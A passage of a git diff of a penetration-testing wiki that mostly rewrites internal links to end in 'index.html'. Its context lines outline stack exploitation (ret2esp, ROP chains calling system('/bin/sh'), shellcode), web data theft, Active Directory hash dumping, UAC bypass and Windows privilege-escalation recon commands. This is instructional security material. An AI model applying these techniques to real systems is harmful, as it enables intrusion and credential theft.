controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md index 920fe6d48..2f7e1001f 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md @@ -6,7 +6,7 @@ **Because the ESP (Stack Pointer) always points to the top of the stack**, this technique involves replacing the EIP (Instruction Pointer) with the address of a **`jmp esp`** or **`call esp`** instruction. By doing this, the shellcode is placed right after the overwritten EIP. When the `ret` instruction executes, ESP points to the next address, precisely where the shellcode is stored. -If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/)). +If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)). Moreover, being able to place the shellcode **after the EIP corruption**, rather than in the middle of the stack, ensures that any `push` or `pop` instructions executed during the function's operation don't interfere with the shellcode. This interference could happen if the shellcode were placed in the middle of the function's stack. @@ -56,7 +56,7 @@ You can find an example here: [https://ir0nstone.gitbook.io/notes/types/stack/re ## Protections - [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it. -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Those can make harder to find a instruction to jump to esp or any other register. +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) & [**PIE**](../common-binary-protections-and-bypasses/pie/index.html): Those can make harder to find a instruction to jump to esp or any other register. ## References diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md index dd2e8067f..82d8a9b69 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md @@ -77,8 +77,8 @@ The Python script sends a carefully crafted message that, when processed by the ## Protections -- [**PIE**](../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address. -- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed. +- [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address. +- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/index.html) should be also disabled or the compromised EIP return address won't never be followed. ## Other examples & References diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md index 495b9aaf9..a87729f32 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md @@ -37,7 +37,7 @@ First, let's assume we've identified the necessary gadgets within the binary or Using **pwntools**, we prepare the stack for the ROP chain execution as follows aiming to execute `system('/bin/sh')`, note how the chain starts with: 1. A `ret` instruction for alignment purposes (optional) -2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/)) +2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/index.html)) 3. Placeholder for the return address from `system()` 4. `"/bin/sh"` string address (parameter for system function) @@ -148,8 +148,8 @@ In this example: ## Protections -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) -- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) +- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/index.html) ## Other Examples & References diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md index 3c39e27b3..3808c334a 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md @@ -53,7 +53,7 @@ Now, the **`ESP`** is controlled pointing to a desired address and the next inst Basically this way it's possible to chain several fake EBPs to control the flow of the program. -This is like a [ret2lib](ret2lib/), but more complex with no apparent benefit but could be interesting in some edge-cases. +This is like a [ret2lib](ret2lib/index.html), but more complex with no apparent benefit but could be interesting in some edge-cases. Moreover, here you have an [**example of a challenge**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) that uses this technique with a **stack leak** to call a winning function. This is the final payload from the page: diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md index 533b36cc0..0dc2b2b02 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md @@ -78,8 +78,8 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w ## Protections -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. -- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed. +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. +- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/index.html) should be also disabled or the compromised EIP return address won't never be followed. - [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable. ## Other Examples & References diff --git a/src/stealing-sensitive-information-disclosure-from-a-web.md b/src/stealing-sensitive-information-disclosure-from-a-web.md index db0f19686..e8650a0af 100644 --- a/src/stealing-sensitive-information-disclosure-from-a-web.md +++ b/src/stealing-sensitive-information-disclosure-from-a-web.md @@ -6,8 +6,8 @@ If at some point you find a **web page that presents you sensitive information b Here I present you the main ways to can try to achieve it: - [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page. -- [**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. -- [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. +- [**XSS**](pentesting-web/xss-cross-site-scripting/index.html): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. +- [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/index.html): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. - [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)). {{#include ./banners/hacktricks-training.md}} diff --git a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md index c98b41c17..2fb8aa3d9 100644 --- a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md +++ b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md @@ -6,8 +6,8 @@ If at some point you find a **web page that presents you sensitive information b Here I present you the main ways to can try to achieve it: - [**CORS bypass**](../pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page. -- [**XSS**](../pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. -- [**Danging Markup**](../pentesting-web/dangling-markup-html-scriptless-injection/): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. +- [**XSS**](../pentesting-web/xss-cross-site-scripting/index.html): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. +- [**Danging Markup**](../pentesting-web/dangling-markup-html-scriptless-injection/index.html): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. - [**Clickjaking**](../pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)). {{#include ../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md index ce0580566..ad92623b4 100644 --- a/src/windows-hardening/active-directory-methodology/README.md +++ b/src/windows-hardening/active-directory-methodology/README.md @@ -76,7 +76,7 @@ If you just have access to an AD environment but you don't have any credentials/ ### User enumeration -- **Anonymous SMB/LDAP enum:** Check the [**pentesting SMB**](../../network-services-pentesting/pentesting-smb/) and [**pentesting LDAP**](../../network-services-pentesting/pentesting-ldap.md) pages. +- **Anonymous SMB/LDAP enum:** Check the [**pentesting SMB**](../../network-services-pentesting/pentesting-smb/index.html) and [**pentesting LDAP**](../../network-services-pentesting/pentesting-ldap.md) pages. - **Kerbrute enum**: When an **invalid username is requested** the server will respond using the **Kerberos error** code _KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error _KRB5KDC_ERR_PREAUTH_REQUIRED_, indicating that the user is required to perform pre-authentication. ```bash @@ -160,7 +160,7 @@ Having compromised an account is a **big step to start compromising the whole do Regarding [**ASREPRoast**](asreproast.md) you can now find every possible vulnerable user, and regarding [**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords. - You could use the [**CMD to perform a basic recon**](../basic-cmd-for-pentesters.md#domain-info) -- You can also use [**powershell for recon**](../basic-powershell-for-pentesters/) which will be stealthier +- You can also use [**powershell for recon**](../basic-powershell-for-pentesters/index.html) which will be stealthier - You ca also [**use powerview**](../basic-powershell-for-pentesters/powerview.md) to extract more detailed information - Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a try. Find where users can RDP, find path to other groups, etc. - **Other automated AD enumeration tools are:** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.** @@ -195,7 +195,7 @@ Once you have obtained some credentials you could check if you have access to an If you have compromised credentials or a session as a regular domain user and you have **access** with this user to **any machine in the domain** you should try to find your way to **escalate privileges locally and looting for credentials**. This is because only with local administrator privileges you will be able to **dump hashes of other users** in memory (LSASS) and locally (SAM). -There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/) and a [**checklist**](../checklist-windows-privilege-escalation.md). Also, don't forget to use [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite). +There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/index.html) and a [**checklist**](../checklist-windows-privilege-escalation.md). Also, don't forget to use [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite). ### Current Session Tickets @@ -241,7 +241,7 @@ printnightmare.md ### Hash extraction -Hopefully you have managed to **compromise some local admin** account using [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/).\ +Hopefully you have managed to **compromise some local admin** account using [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/index.html).\ Then, its time to dump all the hashes in memory and locally.\ [**Read this page about different ways to obtain the hashes.**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md) diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md index d7f1ce6fa..37374c53f 100644 --- a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md +++ b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md @@ -188,7 +188,7 @@ If you don't care about being noisy you could always **run something like** [**h ### Your own bypass - Basic UAC bypass methodology -If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking/). +If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking/index.html). 1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level). 2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**. diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md index 8ef62c7be..ca08aced2 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/README.md @@ -413,7 +413,7 @@ powershell -command "Get-Clipboard" ### File and Folder Permissions First of all, listing the processes **check for passwords inside the command line of the process**.\ -Check if you can **overwrite some binary running** or if you have write permissions of the binary folder to exploit possible [**DLL Hijacking attacks**](dll-hijacking/): +Check if you can **overwrite some binary running** or if you have write permissions of the binary folder to exploit possible [**DLL Hijacking attacks**](dll-hijacking/index.html): ```bash Tasklist /SVC #List processes running and services @@ -439,7 +439,7 @@ for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executabl ) ``` -**Checking permissions of the folders of the processes binaries (**[**DLL Hijacking**](dll-hijacking/)**)** +**Checking permissions of the folders of the processes binaries (**[**DLL Hijacking**](dll-hijacking/index.html)**)** ```bash for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v @@ -552,7 +552,7 @@ For the detection and exploitation of this vulnerability, the _exploit/windows/l ### Services binaries weak permissions -**Check if you can modify the binary that is executed by a service** or if you have **write permissions on the folder** where the binary is located ([**DLL Hijacking**](dll-hijacking/))**.**\ +**Check if you can modify the binary that is executed by a service** or if you have **write permissions on the folder** where the binary is located ([**DLL Hijacking**](dll-hijacking/index.html))**.**\ You can get every binary that is executed by a service using **wmic** (not in system32) and check your permissions using **icacls**: ```bash @@ -647,7 +647,7 @@ Windows allows users to specify actions to be taken if a service fails. This fea ### Installed Applications -Check **permissions of the binaries** (maybe you can overwrite one and escalate privileges) and of the **folders** ([DLL Hijacking](dll-hijacking/)). +Check **permissions of the binaries** (maybe you can overwrite one and escalate privileges) and of the **folders** ([DLL Hijacking](dll-hijacking/index.html)). ```bash dir /a "C:\Program Files" @@ -1540,7 +1540,7 @@ If you want to read an example of [**how to go from high integrity to System usi ### Dll Hijacking If you manages to **hijack a dll** being **loaded** by a **process** running as **SYSTEM** you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful to this kind of privilege escalation, and, moreover, if far **more easy to achieve from a high integrity process** as it will have **write permissions** on the folders used to load dlls.\ -**You can** [**learn more about Dll hijacking here**](dll-hijacking/)**.** +**You can** [**learn more about Dll hijacking here**](dll-hijacking/index.html)**.** ### **From Administrator or Network Service to System**